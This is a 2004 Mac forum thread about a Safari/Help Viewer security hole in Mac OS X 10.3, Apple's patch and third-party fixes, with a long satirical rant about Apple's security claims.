Some semi good news. According to MacSlash, the latest build of 10.3.4 beta is immune to at least one of the exploits out there. :) The question I have is: do you need to upgrade to 10.3.4 from 10.3.3 to fix or will Apple update all 10.3.x systems? I know there will be a security fix for 10.2.x because Apple will not upgrade everyone to 10.3 to fix the problem. But will they force an upgrade on all 10.3 users to 10.3.4?
The link to the MacSlash story: MacSlash (http://macslash.org/article.pl?sid=04/05/20/1711258&mode=thread)

JFreak
May 21, 2004, 02:19 PM
the question I have is do you need to upgrade to 10.3.4 from 10.3.3 to fix or will Apple update all 10.3.x. systems?

usually there are two different upgrade packages: one for updating the previous latest system (10.3.3) and a "combo update" for updating any 10.3.x system. naturally the combo install package is larger in file size.

Quarkie
May 21, 2004, 03:37 PM
No disrespect intended, but I just read this thread and, quite honestly, as a long-time Mac user, the whole discussion of this problem and OSX/Safari security & exploits is both unfortunate and sadly comical. Whether you view OSX as a 5% marketshare OS, or in its larger context among other *nix derivatives, it's really time that OSX users woke up to the fact that claims about OSX security are a bunch of hooey.

OSX and its applications are no better or worse than any other piece of software as far as security goes, including Windows and other *nix flavors, and the "post hoc Apple propter hoc" logic just doesn't work. Just because there haven't been many serious breaches doesn't mean you're safe. In comparison, Windows variants have obviously had their problems, but also run 90+% of the world's personal computers and are constant targets. From that standpoint, you could possibly argue that Windows is actually safer.

Oh look! Someone left a note:
Dear Mac Users All Over The World,

You're all safe all the time if you use OSX and Safari, since they are absolutely secure and bullet-proof, unlike Windows, which the whole world knows is an unsafe, buggy piece of crap. Oh, and because the majority of the world doesn't care about or look for OSX security problems due to our tiny marketshare, you're even safer! In fact, that's why we chose endangered, inbred cats that mostly live in game preserves and zoos to advertise our software. Meow.

Love, Steve

ps. I left some Apple-shaped cookies and milk near your mouse for when you get home from Computer Kindergarten and I even took a bite out of each one, just the way you like it. Oh, and there are some Little Friskies for kitty.

If anybody needs to re-order any of the following, there's still time before inventory runs out:
- Apple SpinFlakes - mmmm - great for breakfast
- Rose-Colored Apple Sunglasses
- Brainwashing Sleep Tapes
- A Freshly-Pressed Sheep Suit

There is no such thing as a secure OS, which is the fundamental rationale for things like external firewalls. OS security, and that of contained software such as Safari, is a relative concept, and I am eagerly awaiting the next campaign from the Apple Spin Machine once the world realizes that OSX is not really as safe as Apple claims.

I guess as long as this thread is partially about comedy...
-----------------------------------------------------
Recent Apple Spin Doctor Brain-Storming Session On Software Security:
"Uh oh...the Safari script kiddies got us...now what do we say about Safari & OSX, since the world obviously knows that they're not as safe as we say???"
"Well, it's just some scripts. Cut and run! No wait! We can just change the OS & browser codenames to make it look like we're doing something. We'll lose the cats and start using ultra-tough, military names!"
"We could also include a bunch of little plastic army men in the box to give the impression of high security! We'll tell everyone they're safe from Viruses of Mass Destruction."
"Yeah - and we can even write our own virus as proof of VMDs!"
"Will Steve be head of MacLand Security? AUGHH! He's going to fire us!"
"Shut up, you idiot!"
"Hmmm...Viruses of Mass Destruction...maybe we could finally appeal to conservative Republicans and dupe the Europeans to increase sales."
"That is so dumb. Plastic is bad for the environment!"
"But it's good for Republicans."
"And Europeans!"
"OSXI: Screaming Eagle!"
"...featuring 'Talon,' the 8th generation web browser!"
"What was the 7th generation?"
"Who cares?"
"Can we make the screen bleed with cool 3D effects?"
"This is better: 'In 1984, Apple invented the Macintosh. In 2004, they've reinvented the pixel.' Ha ha."
"That's never going to work! First the benchmark fiascos, and now this! AUGGHH! We're doomed! Steve's going to fire us!!"
[everyone else in unison] "SHUT UP, you idiot!!"
"OK...well...how about this? 'OSX - it's safe-ER.'"
"It's the SAFIEST! Errr..Safeway!! Sorry - I'm hungry - pass the Krispy Kremes..."
"No wait! We're on to something! 'As a cutting-edge, visionary OS developer, sometimes you have to break the security mold and trade safety for more features.'"
"That totally works for the press release!"
"Yeah! That's it! We give you more features!"
"And plastic army men!"
"And pixels!"
"Are more features better or worse for the environment than plastic?"
"OK - wait - I've got it. 'Less safe, More features!'"
"No...'less' is no good - too negative - we need a more spinny word that implies no culpability on our part for the obvious, gaping OS and software security holes that we don't want anyone to know about! Well...unless someone leaks them so that we have to acknowledge they exist."
"Hang on! I'VE GOT IT!! 'Tastes safe. More features!'"
"Taste is good. People like to eat...well maybe not crow. HEY! why didn't that @%@$#@!! admin get more Krispy Kremes? I sent the memo last week!!"
"Ugh! Contractors! Let's redesign their badge color and make them wear funny hats."
"C'mon - get back on task. We can torture the part-time peons later!"
"Taste has great spin! Can we trademark it??"
"Wait - how about this: 'Think Disk Doctor!'"
"Hey! That's good for a Norton co-marketing campaign - awesome - we'll stick it to them with a buy-in deal and also charge users for security upgrades! heh heh!"
"Sweet!"
"Tastes safe...but is it? Ha ha!"
"We can include a little army medic guy and field ambulance with a real siren in special ultra-secure theme bundles!"
"Cool! We can even resurrect the old tank ad!"
"Yeah - let's overlay a camouflage-colored iPod on the General!"
"Hey yeah! And he needs a red LED like the Terminator! 'I vill protect you, MacOS. I am de Mac-inator.' Ha ha!"
"Can he dance hip hop and grimace threateningly at the same time?"
"Sure. By the time we're done with him, he'll be running for office!"
"These are all good ideas, but we need more user subjugation."
"How about a privacy-invading, mail-in insert in every box for a free leather mousepad and a verbally abusive screen saver module?"
"We could make users say 'baaaa-a-a-aaa' while clicking our new limited liability 'super secure OS' user agreement!"
"Get legal on the phone."
[...brief conversation with Legal while more Krispy Kremes vanish from the box...]
"Sorry - they say we can't use a sheep sound because Apple Records will sue us again due to the obvious, musical nature of animal noises, and especially sheep."
"Even if we call it 'soshearmi?'"
"OK...forget the sheep noise...how about 'Who's Your Daddy?!'"
"Yeah! We could use the voice recognition software to make sure they said it while clicking the 'I agree' button!"
"What if they mess up?"
"They have to keep saying it until they get it right."
"PERFECT!"
"I like it! It really feeds the dysfunctional sense of attachment and self-destructive, myopic fanaticism of our core users!"
"Wait! I've got it - TALKING miniature army men with FIREWIRE PORTS! [deep army voice] 'Stand back, cyber-citizens, this is a secure area.' Ha ha!"
"We could have a TV show about anthropomorphic software modules defending the country against Internet invaders and call it 'Cat Patrol!'"
"What are the firewire ports for?"
"DUH! Higher chip volumes to drive down the cost of CPU hardware! How else are we going to make money? How long have you been working here, anyway?"
"We're going to need more Krispy Kremes..."
"Someone get Mattel on the phone..."

Quarkie
May 21, 2004, 03:38 PM
Among all the posts in this thread, one of the most interesting is the one by MorganX showing the basic disparity between reality and the Apple Spin Machine (http://forums.macrumors.com/showpost.php?p=846607&postcount=50). Security holes have obviously been an ongoing issue. And, for those of you who said "I shouldn't have said anything! Now the virus hackers are going to find us. Ahhh!! flag-waving, mutant script kiddies from Mars! blah, blah, blah..." you're kidding, RIGHT? :rolleyes:

Besides the myth that OSX is secure, what Apple has also done a good job of spinning is the notion that, somehow, after the Apple Pope of Software Integration has blessed the code with the Holy Sheen of Aqua User Interface, APIs, and Hardware Abstraction Layers, OSX is just one piece of software.

That's a very good trick, considering it contains a myriad of software components/libraries/applications that are part of the core unix distribution (+ many add-ons) that have little to do with Apple and have all of the same security vulnerabilities shared by every other unix distribution using similar code. Apple didn't write it and can only assess the vulnerabilities of the huge codebase based on relatively limited in-house testing, the squealing of a world full of guinea pig testers desperately relying on the integrity of the OS, and the *nix community of developers and users which constantly finds new security issues in the distribution code. But, because it's Apple, flaws which exist in the same distribution everywhere else in the world magically don't exist in OSX and MacLand, right? La, la, laaaa... *fingers in ears.*

The sobering thing about the current Safari security issue is that it seems to be in code that Apple actually wrote. So, if they can't find serious flaws like this in their own code with in-house engineering and testing, what happens with code they didn't write? You could argue that it doesn't make a difference, but theoretically, if you're writing and testing the code yourself, you should be able to have an optimal result. And...where's the quick fix or the official security bulletin?

The Talking Moose desk accessory just leapt out of the graveyard and asked Apple "Hey - Why aren't you doing anything?" Part of the comedy is that the user community has actually fixed the problem before Apple has even admitted to it.

OS foundations aside, the Mac OS in all its incarnations has ALWAYS been susceptible to viruses (nVIR, for example). But, for the current OS, even if there are BSD vulnerabilities, you're still safe from the Windows script kiddies, because they're too dumb to figure out the esoterica of a new OS to create a plague of annoyances, right? Wrong. The *nix userbase is huge, and to make matters worse, the *nix users are actually the smart, usually academic ones, who can certainly figure out how to cause much more trouble than the average script kiddie. Luckily, it's the academic and open source communities, among others, that actually help Apple by constantly increasing the robustness of the underlying distribution code.

So, the question is not *if* there will be a serious Mac security issue, but *when* the next of many will occur. OSX is not a bastion against hacking, and the best thing Apple could do is set standard, realistic OS security expectations for its users and respond to real problems quickly, rather than spin a web of supposed imperviousness, superiority, concealment, and inaction. Beyond that, as others have repeatedly pointed out, it's up to users of any OS to be responsible in the use of the Internet and any other resources external (or introduced) to a particular host computer.

There are dumb things you can do on every OS. But, hang tough, the talking, plastic, firewire port army men are coming to protect you, and they will keep you safe from VMD's. ;)

If only they could save users and large computer manufacturers from themselves...but for that, there's "CAT PATROL!" Tune in next week for an exciting new episode where Panther gets a flea dip! :)

pjkelnhofer
May 21, 2004, 05:37 PM
There is a helpviewer update in Software update.
I just downloaded it and it works like Unsanity's fix by asking you if you want to accept a scheme. Personally, I liked Unsanity's better because it gave you a description of what it was blocking.
So I guess, Apple does read these boards.

Hugin777
May 21, 2004, 06:07 PM
There is a helpviewer update in Software update.
I just downloaded it and it works like Unsanity's fix by asking you if you want to accept a scheme. Personally, I liked Unsanity's better because it gave you a description of what it was blocking.
So I guess, Apple does read these boards.

On my machine it just seems to ignore help:runscript. It starts HelpViewer, but the "runscript=" part is seemingly ignored.

Which URL did you use to test with ?

Edit: the developer says:
that's Paranoid Android presenting its dialog, but since you'd disabled it, it can't find the localized versions of its strings and icon. Once it's loaded into a running process (Safari), it stays loaded. You have to quit and relaunch Safari to unload Paranoid Android.

Rower_CPU
May 21, 2004, 11:59 PM
Quarkie-

Apple released the patch today - nice rant, though. :rolleyes:

Quarkie
May 22, 2004, 12:23 AM
Yes - it's great that they posted the patch...and also about time.

I'm hoping to turn the marketing meeting script above into a major independent film.

And it actually was a pretty fun rant. :p

Does panther need a flea dip? Definitely.

Quarkie
May 22, 2004, 12:26 PM
Hey Rower -

Look! They fixed the problem! (http://apple.slashdot.org/article.pl?sid=04/05/22/1441233&mode=thread&tid=126&tid=172&tid=179&tid=185&tid=190)

*whistling noises*

Quite honestly, it's hard not to laugh (or cry) at Apple's ludicrous software security claims. Maybe you'd like to reconsider your previous sarcasm. ;)

...or maybe you'd like to...

Think Disk Doctor!

:D